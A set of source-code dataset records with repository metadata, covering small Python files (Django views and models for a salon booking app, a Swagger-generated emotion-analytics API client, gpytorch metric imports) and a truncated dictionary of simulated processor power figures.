c2f117d4c173bb206cc834e2954a7bb7d63e4360 | 86 | py | Python | skyflow/errors/__init__.py | skyflowapi/skyflow-python | 1c7220de6698fd6a807932d3d3846b7fe4c61a5c | [
"MIT"
] | 2 | 2022-03-08T22:08:34.000Z | 2022-03-31T15:36:23.000Z | skyflow/errors/__init__.py | skyflowapi/skyflow-python | 1c7220de6698fd6a807932d3d3846b7fe4c61a5c | [
"MIT"
] | 1 | 2022-03-23T04:55:58.000Z | 2022-03-23T04:55:58.000Z | skyflow/errors/__init__.py | skyflowapi/skyflow-python | 1c7220de6698fd6a807932d3d3846b7fe4c61a5c | [
"MIT"
] | 4 | 2022-01-04T10:38:36.000Z | 2022-01-27T06:16:45.000Z | from ._skyflowerrors import SkyflowErrorCodes
from ._skyflowerrors import SkyflowError | 43 | 45 | 0.895349 | 8 | 86 | 9.375 | 0.625 | 0.453333 | 0.613333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081395 | 86 | 2 | 46 | 43 | 0.949367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c2f438f87690770822f6d4f16a02d20b867e00d3 | 117 | py | Python | selia_about/views/about_selia.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | null | null | null | selia_about/views/about_selia.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | 7 | 2020-02-12T02:58:52.000Z | 2022-02-10T08:52:44.000Z | selia_about/views/about_selia.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | null | null | null | from django.shortcuts import render
def about_selia(request):
return render(request, 'selia_about/selia.html')
| 19.5 | 52 | 0.777778 | 16 | 117 | 5.5625 | 0.6875 | 0.224719 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 117 | 5 | 53 | 23.4 | 0.872549 | 0 | 0 | 0 | 0 | 0 | 0.188034 | 0.188034 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
6c541d6189092899b80cd3f04976b03599e0a809 | 90 | py | Python | _website/models/__init__.py | marcoEDU/HackerspaceWebsiteTemplate | 29621a5f5daef7a8073f368b7d95a1df654c8ba9 | [
"MIT"
] | 9 | 2019-11-04T04:46:08.000Z | 2019-12-29T22:24:38.000Z | _website/models/__init__.py | marcoEDU/HackerspaceWebsiteTemplate | 29621a5f5daef7a8073f368b7d95a1df654c8ba9 | [
"MIT"
] | 27 | 2020-02-17T17:57:00.000Z | 2020-04-23T20:25:44.000Z | _website/models/__init__.py | marcoEDU/HackerspaceWebsiteTemplate | 29621a5f5daef7a8073f368b7d95a1df654c8ba9 | [
"MIT"
] | 4 | 2020-02-17T13:39:18.000Z | 2020-04-12T07:56:45.000Z | from _website.models.request import Request
from _website.models.response import Response
| 30 | 45 | 0.866667 | 12 | 90 | 6.333333 | 0.5 | 0.289474 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 90 | 2 | 46 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
669693377b95fb929116eaaaed53de61650bb967 | 11,354 | py | Python | crowdemotion_api_client_python/apis/timeseries_api.py | CrowdEmotion/crowdemotion-api-client-python | b5ec57030e36d2b2c32cc5a43b804d7a34401c16 | [
"Apache-2.0"
] | 1 | 2018-06-14T05:12:54.000Z | 2018-06-14T05:12:54.000Z | python/crowdemotion_api_client_python/apis/timeseries_api.py | CrowdEmotion/crowdemotion-api-clients-examples | 9e4bd38279399e5694cf3cec6cc7fb0b3149bc39 | [
"MIT"
] | null | null | null | python/crowdemotion_api_client_python/apis/timeseries_api.py | CrowdEmotion/crowdemotion-api-clients-examples | 9e4bd38279399e5694cf3cec6cc7fb0b3149bc39 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
CloudEmotion API v1
CrowdEmotion API
OpenAPI spec version: 1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TimeseriesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def timeseries_delete(self, response_id, **kwargs):
"""
Delete a Timeseries
<p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.timeseries_delete(response_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int response_id: ID of the Response associated to the TimeSeries. (required)
:param int metric_id: ID of the Metric of the Timeseries to be deleted.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.timeseries_delete_with_http_info(response_id, **kwargs)
else:
(data) = self.timeseries_delete_with_http_info(response_id, **kwargs)
return data
def timeseries_delete_with_http_info(self, response_id, **kwargs):
"""
Delete a Timeseries
<p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.timeseries_delete_with_http_info(response_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int response_id: ID of the Response associated to the TimeSeries. (required)
:param int metric_id: ID of the Metric of the Timeseries to be deleted.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['response_id', 'metric_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method timeseries_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'response_id' is set
if ('response_id' not in params) or (params['response_id'] is None):
raise ValueError("Missing the required parameter `response_id` when calling `timeseries_delete`")
resource_path = '/timeseries'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'response_id' in params:
query_params['response_id'] = params['response_id']
if 'metric_id' in params:
query_params['metric_id'] = params['metric_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def timeseries_get(self, response_id, **kwargs):
"""
Get all recorded timeseries for a Response
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.timeseries_get(response_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int response_id: ID of the Response associated to the TimeSeries. (required)
:param int metric_id: ID of the Metric associated to the TimeSeries.
:param bool normalize: Return data beetwen 0 and 1. Default: false.
:param str format: If value is 'csv' then data is passed back in CSV format insted of the default time-series format. Example: csv.
:return: list[Timeseries]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.timeseries_get_with_http_info(response_id, **kwargs)
else:
(data) = self.timeseries_get_with_http_info(response_id, **kwargs)
return data
def timeseries_get_with_http_info(self, response_id, **kwargs):
"""
Get all recorded timeseries for a Response
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.timeseries_get_with_http_info(response_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int response_id: ID of the Response associated to the TimeSeries. (required)
:param int metric_id: ID of the Metric associated to the TimeSeries.
:param bool normalize: Return data beetwen 0 and 1. Default: false.
:param str format: If value is 'csv' then data is passed back in CSV format insted of the default time-series format. Example: csv.
:return: list[Timeseries]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['response_id', 'metric_id', 'normalize', 'format']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method timeseries_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'response_id' is set
if ('response_id' not in params) or (params['response_id'] is None):
raise ValueError("Missing the required parameter `response_id` when calling `timeseries_get`")
resource_path = '/timeseries'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'response_id' in params:
query_params['response_id'] = params['response_id']
if 'metric_id' in params:
query_params['metric_id'] = params['metric_id']
if 'normalize' in params:
query_params['normalize'] = params['normalize']
if 'format' in params:
query_params['format'] = params['format']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Timeseries]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 40.98917 | 139 | 0.59424 | 1,265 | 11,354 | 5.164427 | 0.16917 | 0.048982 | 0.026022 | 0.011021 | 0.834685 | 0.825961 | 0.825961 | 0.810654 | 0.810654 | 0.807898 | 0 | 0.001956 | 0.324643 | 11,354 | 276 | 140 | 41.137681 | 0.848461 | 0.406905 | 0 | 0.680328 | 1 | 0 | 0.15943 | 0.021876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040984 | false | 0 | 0.057377 | 0 | 0.155738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
669cb0f1c8bc945f42f4d79d3c2da4120949dc47 | 344 | py | Python | gpytorch/metrics/__init__.py | llguo95/gpytorch | 1fa69935104565c377ce95d2c581c9eedfb55817 | [
"MIT"
] | 188 | 2017-06-09T20:42:18.000Z | 2018-02-15T11:17:09.000Z | gpytorch/metrics/__init__.py | llguo95/gpytorch | 1fa69935104565c377ce95d2c581c9eedfb55817 | [
"MIT"
] | 49 | 2017-07-18T02:55:17.000Z | 2018-02-15T21:23:42.000Z | gpytorch/metrics/__init__.py | llguo95/gpytorch | 1fa69935104565c377ce95d2c581c9eedfb55817 | [
"MIT"
] | 24 | 2017-07-12T17:29:52.000Z | 2018-02-15T19:25:07.000Z | from .metrics import (
mean_absolute_error,
mean_squared_error,
mean_standardized_log_loss,
negative_log_predictive_density,
quantile_coverage_error,
)
__all__ = [
"mean_absolute_error",
"mean_squared_error",
"mean_standardized_log_loss",
"negative_log_predictive_density",
"quantile_coverage_error",
]
| 21.5 | 38 | 0.75 | 38 | 344 | 6.052632 | 0.421053 | 0.156522 | 0.147826 | 0.182609 | 0.913043 | 0.913043 | 0.913043 | 0.913043 | 0.913043 | 0.913043 | 0 | 0 | 0.174419 | 344 | 15 | 39 | 22.933333 | 0.809859 | 0 | 0 | 0 | 0 | 0 | 0.340116 | 0.232558 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dd912ee6d81aa1d298bb1487d76bbf09631ed5e8 | 2,059 | py | Python | salonapp/models.py | mollybeach/madeleineSalon | a4cfe05d85bfcf603b204b4e681a82e312b8f5be | [
"Apache-2.0"
] | 1 | 2021-07-17T05:34:07.000Z | 2021-07-17T05:34:07.000Z | salonapp/models.py | mollybeach/madeleineSalon | a4cfe05d85bfcf603b204b4e681a82e312b8f5be | [
"Apache-2.0"
] | null | null | null | salonapp/models.py | mollybeach/madeleineSalon | a4cfe05d85bfcf603b204b4e681a82e312b8f5be | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django import forms
from datetime import datetime
# Create your models here.
class Users(models.Model):
firstname = models.CharField(max_length=2000, null=True, blank=True, default=None)
lastname = models.TextField(max_length=20000, null=True, blank=True, default=None)
email = models.TextField(max_length=20000, null=True, blank=True, default=None)
service = models.TextField(max_length=20000, null=True, blank=True, default=None)
telephone = models.TextField(max_length=20000, null=True, blank=True, default=None)
appointmentdate= models.TextField(max_length=20000, null=True, blank=True, default=None)
time = models.DateTimeField(max_length=20000, null=True, blank=True, default=None)
def _str_(self):
return self.firstname +" " + self.lastname + " " +self.email+" "+self.service+" "+self.telephone+" "+self.appointmentdate+" "+self.time
class Payment(models.Model):
nameoncard = models.CharField(max_length=2000, null=True, blank=True, default=None)
email = models.TextField(max_length=20000, null=True, blank=True, default=None)
service = models.TextField(max_length=20000, null=True, blank=True, default=None)
telephone = models.TextField(max_length=20000, null=True, blank=True, default=None)
appointmentdate= models.TextField(max_length=20000, null=True, blank=True, default=None)
time = models.DateTimeField(max_length=20000, null=True, blank=True, default=None)
creditcardnumber = models.TextField(max_length=20000, null=True, blank=True, default=None)
cvv = models.TextField(max_length=20000, null=True, blank=True, default=None)
expiration = models.TextField(max_length=20000, null=True, blank=True, default=None)
billingaddress = models.TextField(max_length=20000, null=True, blank=True, default=None)
def _str_(self):
return self.nameoncard +" "+self.email+" "+self.service+" "+self.telephone+" "+self.appointmentdate+" "+self.time+" "+self.creditcardnumber+" "+self.cvv+" "+self.expiration+" "+self.billingaddress
| 64.34375 | 204 | 0.743565 | 271 | 2,059 | 5.571956 | 0.154982 | 0.101325 | 0.146358 | 0.191391 | 0.804636 | 0.804636 | 0.804636 | 0.804636 | 0.804636 | 0.804636 | 0 | 0.045806 | 0.119961 | 2,059 | 31 | 205 | 66.419355 | 0.787528 | 0.011656 | 0 | 0.461538 | 0 | 0 | 0.007389 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.115385 | 0.076923 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
66072cb186599158b467a51bd9445f1571f40bb9 | 68,593 | py | Python | benchmarks/SimResults/Paper2_rr_spec_base/cmp_gobmksoplexpovraycalculix/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/Paper2_rr_spec_base/cmp_gobmksoplexpovraycalculix/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/Paper2_rr_spec_base/cmp_gobmksoplexpovraycalculix/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.195957,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.356602,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.05505,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.479848,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.830923,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.476558,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.78733,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.312556,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.38776,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.199321,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0173949,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.199279,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.128646,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.3986,
'Execution Unit/Register Files/Runtime Dynamic': 0.146041,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.535225,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.11318,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.80853,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00228312,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00228312,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00200304,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000783307,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00184801,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00841729,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0213744,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.12367,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.342323,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.42004,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.915826,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0978673,
'L2/Runtime Dynamic': 0.0147116,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.97925,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.33351,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
